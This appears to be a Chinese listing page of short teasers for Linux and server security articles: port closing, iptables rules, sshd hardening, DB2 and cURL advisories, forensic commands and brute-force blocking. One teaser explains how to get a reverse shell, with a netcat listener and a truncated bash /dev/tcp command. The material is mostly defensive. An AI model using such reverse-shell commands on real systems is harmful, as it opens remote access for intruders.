关闭TCP中有重要风险性的如1025等端口（图解）

操作要领：封闭端口，杜绝网络病毒对这些端口的访问权，以保障计算机安全，减少病毒对上网速度的影响。 近日发现有些人感染了新的网络蠕虫病毒，该病毒使用冲击波病毒专杀工具无法杀除，请各位尽快升级计算机上的杀毒软件病毒库，在断开计算机网络连接的情况...

Linux系统防火墙防止DOS和CC攻击的方法

用Linux系统防火墙功能抵御 网络 攻击 虚拟主机 服务 商在运营过程中可能会受到黑客攻击，常见的攻击方式有SYN，DDOS等。 通过更换IP，查找被攻击的站点可能避开攻击，但是中断 服务 的时间比较长。比较彻底 的 解决方法 是添置硬件防火墙。不过，硬件防火墙...

用 root 安全登录 VPS 的方法

VPS 好比一个 Internet 上的独立服务器，有 root 权限，有独立 IP，完全暴露在 Internet上，所以用 root 登录 VPS 操作时要特别注意安全问题，这年头无聊的人太多了，如果你对安全问题还有犹豫，抱有我这个小站没人理的想法，那么打开 /var/log/secure 看看...

VPS的简单安全措施三步曲

一、开防火墙，不用的端口都禁止掉 /etc/init.d/iptables start //简单的规则如下所示，具体的大家根据情况自己变通 /sbin/iptables -F /sbin/iptables -A INPUT -p tcp -i vnet0 dport ssh -j ACCEPT /sbin/iptables -A INPUT -p tcp -i vnet0 dport 80 -j...

设置Linux sshd确保远程服务器访问安全

虽然SSH的设计目的在于安全访问，但它有的功能确实为入侵敞开了大门。不过只要稍作修改，Linux管理员就可以让sshd更加安全。 多数Linux服务器在默认下通过SSH运行Secure Shell Daemon （sshd）进程以便进行远程访问。Linuxsshd是一种简单的方式，允许远程用...

Linux如何使用命令生成反弹SHELL

【Reverse shell】也叫反弹shell，是渗透攻击的基本功，如果你找到机会让远端的机器执行你注入的代码，你的代码怎样才能为你生成一个可以交互操作的shell呢? 你可以在本地先用nc启动一个监听进程【nc -l 端口号】 然后在远端执行【bash -i /dev/tcp/你本地的...

多个IBM DB2产品远程拒绝服务漏洞(CVE-2014-6159)

发布日期：2014-11-07 更新日期：2014-11-18 受影响系统： IBM DB2 9.x IBM DB2 10.x 描述： BUGTRAQ ID: 71006 CVE(CAN) ID: CVE-2014-6159 IBM DB2是一个大型的商业关系数据库系统。 IBM DB2 9.7－FP10、9.8－FP5、10.5－FP4(Linux, UNIX, Windows)在启用...

cURL/libcURL 'curl_easy_duphandle()'函数堆内存破坏漏洞

发布日期：2014-11-05 更新日期：2014-11-18 受影响系统： cURL cURL 7.17.1－7.38.0 描述： BUGTRAQ ID: 70988 CVE(CAN) ID: CVE-2014-3707 cURL/libcURL是命令行传输文件工具，支持FTP、FTPS、HTTP、HTTPS、GOPHER、TELNET、DICT、FILE和LDAP。 cURL/libcU...

追查黑客攻击常用linux命令

1 可以得出filename正在运行的进程 #pidof filename 2 可以通过文件或者tcp udp协议看到进程 #fuser -n tcp port 3 可以看文件修改时间，大小等信息 #stat filename 4 看加载模块 #lsmod 5 看rpc服务开放 #rpcinfo -p 6 看网卡是否混杂模式(promiscuous mod)...

用SHELL脚本来防止暴力破解

我的一台公网服务器，由于网站采取的是双备份策略，所以开放了vsftpd的21端口，近来发现许多人在尝试暴力破解vsftpd和ssh，我随便看了看/var/log/secure日志，显示如下： 118.33.110.52=2834 119.145.254.77=37 121.254.179.199=226 121.88.250.243=35 200.29...